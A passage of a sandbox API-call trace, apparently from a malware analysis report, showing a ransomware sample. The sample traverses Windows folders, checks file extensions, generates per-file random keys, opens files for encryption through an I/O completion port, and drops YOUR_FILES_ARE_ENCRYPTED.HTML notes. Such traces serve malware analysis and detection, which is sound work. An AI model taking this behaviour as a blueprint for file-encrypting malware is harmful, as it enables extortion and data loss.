lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Logs", cAlternateFileName="")) returned 0 [0109.699] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.700] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0109.700] GetProcessHeap () returned 0x600000 [0109.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b47b0 [0109.700] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\USOShared\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\usoshared\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.701] WriteFile (in: hFile=0x300, lpBuffer=0x6b47b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6b47b0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.701] CloseHandle (hObject=0x300) returned 1 [0109.702] GetProcessHeap () returned 0x600000 [0109.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.702] GetProcessHeap () returned 0x600000 [0109.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.703] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 0 [0109.703] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0109.703] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 48 [0109.704] GetProcessHeap () returned 0x600000 [0109.704] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0109.704] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0109.704] WriteFile (in: hFile=0x2fc, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0109.706] CloseHandle (hObject=0x2fc) returned 1 [0109.706] GetProcessHeap () returned 0x600000 [0109.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.706] GetProcessHeap () returned 0x600000 [0109.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0109.707] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Recovery", cAlternateFileName="")) returned 1 [0109.708] StrStrIW (lpFirst="Recovery", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.708] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0109.708] GetProcessHeap () returned 0x600000 [0109.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.708] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0109.708] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\*") returned="\\\\?\\C:\\Recovery\\*" [0109.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.709] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0109.709] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 1 [0109.709] StrStrIW (lpFirst="WindowsRE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.709] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\WindowsRE") returned 25 [0109.709] GetProcessHeap () returned 0x600000 [0109.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0109.710] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Recovery\\WindowsRE" | out: lpString1="\\\\?\\C:\\Recovery\\WindowsRE") returned="\\\\?\\C:\\Recovery\\WindowsRE" [0109.710] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\WindowsRE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\WindowsRE\\*") returned="\\\\?\\C:\\Recovery\\WindowsRE\\*" [0109.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\WindowsRE\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626838 [0109.710] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.711] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbaa998b0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x136e0f4d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0109.747] StrStrIW (lpFirst="boot.sdi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.747] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\WindowsRE\\boot.sdi") returned 34 [0109.747] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0109.747] lstrlenW (lpString=".sdi") returned 4 [0109.747] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0109.747] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xbadba904, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName="ReAgent.xml", cAlternateFileName="")) returned 1 [0109.747] StrStrIW (lpFirst="ReAgent.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.747] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 37 [0109.747] PathFindExtensionW (pszPath="ReAgent.xml") returned=".xml" [0109.747] lstrlenW (lpString=".xml") returned 4 [0109.747] PathFindExtensionW (pszPath="ReAgent.xml") returned=".xml" [0109.748] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0109.748] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "c:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0109.748] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19f0f4 | out: lpFileSize=0x19f0f4*=1045) returned 1 [0109.748] GetProcessHeap () returned 0x600000 [0109.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0109.751] wsprintfW (in: param_1=0x19f00e, param_2="%02X" | out: param_1="7E") returned 2 [0109.751] wsprintfW (in: param_1=0x19f012, param_2="%02X" | out: param_1="93") returned 2 [0109.751] wsprintfW (in: param_1=0x19f016, param_2="%02X" | out: param_1="51") returned 2 [0109.751] wsprintfW (in: param_1=0x19f01a, param_2="%02X" | out: param_1="C7") returned 2 [0109.751] wsprintfW (in: param_1=0x19f01e, param_2="%02X" | out: param_1="5A") returned 2 [0109.751] wsprintfW (in: param_1=0x19f022, param_2="%02X" | out: param_1="BC") returned 2 [0109.751] wsprintfW (in: param_1=0x19f026, param_2="%02X" | out: param_1="89") returned 2 [0109.751] wsprintfW (in: param_1=0x19f02a, param_2="%02X" | out: param_1="17") returned 2 [0109.751] wsprintfW (in: param_1=0x19f02e, param_2="%02X" | out: param_1="1E") returned 2 [0109.751] wsprintfW (in: param_1=0x19f032, param_2="%02X" | out: param_1="DC") returned 2 [0109.751] wsprintfW (in: param_1=0x19f036, param_2="%02X" | out: param_1="AC") returned 2 [0109.760] wsprintfW (in: param_1=0x19f03a, param_2="%02X" | out: param_1="26") returned 2 [0109.760] wsprintfW (in: param_1=0x19f03e, param_2="%02X" | out: param_1="61") returned 2 [0109.760] wsprintfW (in: param_1=0x19f042, param_2="%02X" | out: param_1="53") returned 2 [0109.760] wsprintfW (in: param_1=0x19f046, param_2="%02X" | out: param_1="51") returned 2 [0109.760] wsprintfW (in: param_1=0x19f04a, param_2="%02X" | out: param_1="83") returned 2 [0109.760] wsprintfW (in: param_1=0x19f04e, param_2="%02X" | out: param_1="A4") returned 2 [0109.760] wsprintfW (in: param_1=0x19f052, param_2="%02X" | out: param_1="01") returned 2 [0109.760] wsprintfW (in: param_1=0x19f056, param_2="%02X" | out: param_1="01") returned 2 [0109.760] wsprintfW (in: param_1=0x19f05a, param_2="%02X" | out: param_1="C3") returned 2 [0109.760] wsprintfW (in: param_1=0x19f05e, param_2="%02X" | out: param_1="8D") returned 2 [0109.760] wsprintfW (in: param_1=0x19f062, param_2="%02X" | out: param_1="BC") returned 2 [0109.760] wsprintfW (in: param_1=0x19f066, param_2="%02X" | out: param_1="A4") returned 2 [0109.760] wsprintfW (in: param_1=0x19f06a, param_2="%02X" | out: param_1="0E") returned 2 [0109.760] wsprintfW (in: param_1=0x19f06e, param_2="%02X" | out: param_1="30") returned 2 [0109.760] wsprintfW (in: param_1=0x19f072, param_2="%02X" | out: param_1="8F") returned 2 [0109.760] wsprintfW (in: param_1=0x19f076, param_2="%02X" | out: param_1="06") returned 2 [0109.760] wsprintfW (in: param_1=0x19f07a, param_2="%02X" | out: param_1="AA") returned 2 [0109.760] wsprintfW (in: param_1=0x19f07e, param_2="%02X" | out: param_1="72") returned 2 [0109.760] wsprintfW (in: param_1=0x19f082, param_2="%02X" | out: param_1="F1") returned 2 [0109.760] wsprintfW (in: param_1=0x19f086, param_2="%02X" | out: param_1="6B") returned 2 [0109.760] wsprintfW (in: param_1=0x19f08a, param_2="%02X" | out: param_1="45") returned 2 [0109.761] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\Recovery\\WindowsRE\\ReAgent.xml" | out: lpString1="\\\\?\\C:\\Recovery\\WindowsRE\\ReAgent.xml") returned="\\\\?\\C:\\Recovery\\WindowsRE\\ReAgent.xml" [0109.761] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.761] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0109.767] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xe1aeb488, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xe1aeb488, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x1f0b6c28, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x11b68298, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0109.767] StrStrIW (lpFirst="Winre.wim", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.767] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\WindowsRE\\Winre.wim") returned 35 [0109.767] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0109.767] lstrlenW (lpString=".wim") returned 4 [0109.767] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0109.767] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xe1aeb488, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xe1aeb488, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x1f0b6c28, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x11b68298, dwReserved0=0x637fb0, dwReserved1=0x19f200, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0109.767] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0109.768] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\WindowsRE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 55 [0109.768] GetProcessHeap () returned 0x600000 [0109.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6c47b8 [0109.768] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\WindowsRE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\recovery\\windowsre\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.770] WriteFile (in: hFile=0x300, lpBuffer=0x6c47b8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6c47b8*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.771] CloseHandle (hObject=0x300) returned 1 [0109.771] GetProcessHeap () returned 0x600000 [0109.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.771] GetProcessHeap () returned 0x600000 [0109.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.772] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 0 [0109.772] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.772] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0109.772] GetProcessHeap () returned 0x600000 [0109.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b47b0 [0109.773] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0109.773] WriteFile (in: hFile=0x2fc, lpBuffer=0x6b47b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x6b47b0*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0109.774] CloseHandle (hObject=0x2fc) returned 1 [0109.774] GetProcessHeap () returned 0x600000 [0109.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.774] GetProcessHeap () returned 0x600000 [0109.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.775] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xb8121ae, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0109.775] StrStrIW (lpFirst="swapfile.sys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.775] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\swapfile.sys") returned 19 [0109.775] PathFindExtensionW (pszPath="swapfile.sys") returned=".sys" [0109.776] lstrlenW (lpString=".sys") returned 4 [0109.776] PathFindExtensionW (pszPath="swapfile.sys") returned=".sys" [0109.776] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0109.776] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Users", cAlternateFileName="")) returned 1 [0109.776] StrStrIW (lpFirst="Users", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.776] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0109.776] GetProcessHeap () returned 0x600000 [0109.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.776] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0109.777] lstrcatW (in: lpString1="\\\\?\\C:\\Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\*") returned="\\\\?\\C:\\Users\\*" [0109.777] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0109.777] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0109.777] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x130, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0109.777] StrStrIW (lpFirst="All Users", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.777] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0109.777] GetProcessHeap () returned 0x600000 [0109.777] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0109.778] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\All Users" | out: lpString1="\\\\?\\C:\\Users\\All Users") returned="\\\\?\\C:\\Users\\All Users" [0109.778] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*") returned="\\\\?\\C:\\Users\\All Users\\*" [0109.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb075e856, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x622800, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626978 [0109.779] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb075e856, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x622800, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.779] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, 